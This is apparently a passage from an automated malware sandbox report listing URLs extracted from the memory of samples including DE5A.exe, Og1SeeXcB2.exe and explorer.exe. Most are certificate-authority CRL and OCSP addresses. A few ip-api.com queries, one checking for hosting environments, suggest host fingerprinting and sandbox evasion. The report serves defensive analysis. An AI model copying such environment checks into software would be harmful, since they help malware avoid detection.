00000027.00000003.2468424463.000001FEA7815000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2458790993.000001FEA7813000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                        Source: DE5A.exe, 00000015.00000003.2398538473.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2405728605.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398744659.0000025F9EEE3000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2397863706.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2405471567.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2406691220.0000025F9EEE4000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2408547333.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398642728.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398214140.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398989773.0000025F9EEE4000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2404964950.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398437223.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2397757654.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398121284.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398331494.0000025F9EEE3000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2406836205.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2406691220.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398331494.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398865544.0000025F9EEE4000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2405374161.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2399105753.0000025F9EEE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                        Source: DE5A.exe, 00000015.00000003.2406245957.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2469556169.000001FEA7815000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                        Source: Og1SeeXcB2.exe, 00000000.00000003.1674345470.00000000027E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                        Source: Og1SeeXcB2.exe, 00000000.00000003.1674345470.00000000027E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
                        Source: Og1SeeXcB2.exe, 00000000.00000003.1674345470.00000000027E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                        Source: Og1SeeXcB2.exe, 00000000.00000003.1674345470.00000000027E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
                        Source: Og1SeeXcB2.exe, 00000000.00000003.1674345470.00000000027E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                        Source: DE5A.exe, 00000015.00000003.2480144176.0000025F9EECE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                        Source: DE5A.exe, 00000015.00000003.2406245957.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2469556169.000001FEA7815000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
                        Source: DE5A.exe, 00000015.00000003.2406245957.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2469556169.000001FEA7815000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                        Source: DE5A.exe, 00000015.00000003.2398538473.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2405728605.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398744659.0000025F9EEE3000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2397863706.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2405471567.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2406691220.0000025F9EEE4000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2408547333.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398642728.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398214140.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2404964950.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398437223.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2397757654.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398121284.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398331494.0000025F9EEE3000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2406836205.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2406691220.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398331494.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2405374161.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2397974291.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2458319429.000001FEA7813000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2471211597.000001FEA7815000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                        Source: explorer.exe, 00000012.00000000.2004825375.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.2006529919.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                        Source: DE5A.exe, 00000015.00000003.2398538473.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2405728605.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2397863706.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2405471567.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2408547333.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398642728.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398214140.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2404964950.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398437223.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2397757654.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398121284.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2406836205.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2406691220.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398331494.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2405374161.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2397974291.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2458319429.000001FEA7813000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2471211597.000001FEA7815000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2458495109.000001FEA7813000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2468424463.000001FEA7815000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2458790993.000001FEA7813000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                        Source: DE5A.exe, 00000015.00000003.2398538473.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2405728605.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2397863706.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2405471567.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2408547333.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398642728.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398214140.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2404964950.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398437223.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2397757654.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398121284.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2406836205.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2406691220.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398331494.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2405374161.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2397974291.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2458319429.000001FEA7813000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2471211597.000001FEA7815000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2458495109.000001FEA7813000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2468424463.000001FEA7815000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2458790993.000001FEA7813000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                        Source: DE5A.exe, 00000027.00000003.2468233859.000001FEA7815000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2468233859.000001FEA7822000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                        Source: explorer.exe, 00000012.00000000.2004825375.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.2006529919.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                        Source: DE5A.exe, 00000015.00000003.2398538473.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2405728605.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2397863706.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2405471567.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2408547333.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398642728.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398214140.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2404964950.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398437223.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2397757654.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398121284.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2406836205.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2406691220.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398331494.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2405374161.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2397974291.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2458319429.000001FEA7813000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2471211597.000001FEA7815000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2458495109.000001FEA7813000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2468424463.000001FEA7815000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2458790993.000001FEA7813000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                        Source: DE5A.exe, 00000015.00000003.2480144176.0000025F9EECE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                        Source: DE5A.exe, 00000015.00000003.2406245957.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2469556169.000001FEA7815000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
                        Source: DE5A.exe, 0000002E.00000003.2486129211.000001E8E70A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf);
                        Source: DE5A.exe, 0000002E.00000003.2495061783.000001E8E7F87000.00000004.00000020.00020000.00000000.sdmp, bound.exe, 0000003D.00000003.2501512368.00000000006B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                        Source: DE5A.exe, 00000016.00000002.2467155729.000001F012ACB000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000003.2495793287.000001E8E7918000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/
                        Source: DE5A.exe, 00000016.00000002.2467155729.000001F012BE2000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000002.2582736276.000001E8E78F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/mail/
                        Source: DE5A.exe, 00000016.00000002.2467155729.000001F012ACB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
                        Source: DE5A.exe, 00000016.00000002.2467012632.000001F012910000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/?fields=225545
                        Source: DE5A.exe, 0000002E.00000003.2491861380.000001E8E77E6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000002.2582736276.000001E8E77F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/?fields=225545r
                        Source: DE5A.exe, 00000016.00000002.2466911052.000001F012810000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
                        Source: Og1SeeXcB2.exe, 00000000.00000000.1653801224.000000000040A000.00000008.00000001.01000000.00000003.sdmp, Og1SeeXcB2.exe, 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                        Source: DE5A.exe, 00000015.00000003.2480144176.0000025F9EECE000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000002.2480846633.0000025F9EECE000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2406245957.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000002.2602580173.000001FEA77F8000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2469556169.000001FEA7815000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                        Source: explorer.exe, 00000012.00000000.2004825375.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.2006529919.000000000982D000.00000004.00000001.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398538473.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2405728605.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2397863706.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2405471567.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2408547333.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398642728.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398214140.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2404964950.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398437223.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2397757654.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398121284.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2406836205.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2406691220.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398331494.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2405374161.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2397974291.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2458319429.000001FEA7813000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2471211597.000001FEA7815000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2458495109.000001FEA7813000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                        Source: DE5A.exe, 00000015.00000003.2398538473.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2405728605.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398744659.0000025F9EEE3000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2397863706.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2405471567.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2406691220.0000025F9EEE4000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2408547333.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398642728.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398214140.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398989773.0000025F9EEE4000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2404964950.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398437223.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2397757654.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398121284.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398331494.0000025F9EEE3000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2406836205.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2406691220.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398331494.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398865544.0000025F9EEE4000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2405374161.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2399105753.0000025F9EEE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                        Source: DE5A.exe, 00000015.00000003.2398538473.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2405728605.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398744659.0000025F9EEE3000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2397863706.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2405471567.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2406691220.0000025F9EEE4000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2408547333.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398642728.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398214140.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2404964950.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398437223.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2397757654.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398121284.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398331494.0000025F9EEE3000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2406836205.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2406691220.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398331494.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2405374161.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2397974291.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2458319429.000001FEA7813000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2471211597.000001FEA7815000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                        Source: DE5A.exe, 00000015.00000003.2398538473.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2405728605.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2397863706.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2405471567.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2408547333.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398642728.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398214140.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2404964950.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398437223.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2397757654.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398121284.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2406836205.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2406691220.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2398331494.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2405374161.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2397974291.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2458319429.000001FEA7813000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2471211597.000001FEA7815000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2458495109.000001FEA7813000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2468424463.000001FEA7815000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2458790993.000001FEA7813000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                        Source: explorer.exe, 00000012.00000000.2004825375.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
                        Source: Og1SeeXcB2.exe, 00000000.00000003.1674345470.00000000027E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                        Source: DE5A.exe, 00000015.00000003.2480144176.0000025F9EECE000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000002.2480846633.0000025F9EECE000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000015.00000003.2406245957.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2469556169.000001FEA7815000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                        Source: DE5A.exe, 00000015.00000003.2406245957.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2469556169.000001FEA7815000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
                        Source: Og1SeeXcB2.exe, 00000000.00000003.1674345470.00000000027E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
                        Source: Og1SeeXcB2.exe, 00000000.00000003.1674345470.00000000027E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr306
                        Source: Og1SeeXcB2.exe, 00000000.00000003.1674345470.00000000027E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                        Source: DE5A.exe, 00000015.00000003.2406245957.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2469556169.000001FEA7815000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcb.com/universal-root.crl0
                        Source: DE5A.exe, 00000015.00000003.2406245957.0000025F9EED7000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2469556169.000001FEA7815000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcd.com06
                        Source: explorer.exe, 00000012.00000000.2005638058.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000012.00000000.2007696851.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000012.00000000.2006052224.0000000008720000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
                        Source: Og1SeeXcB2.exe, 00000000.00000003.1674345470.00000000027E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
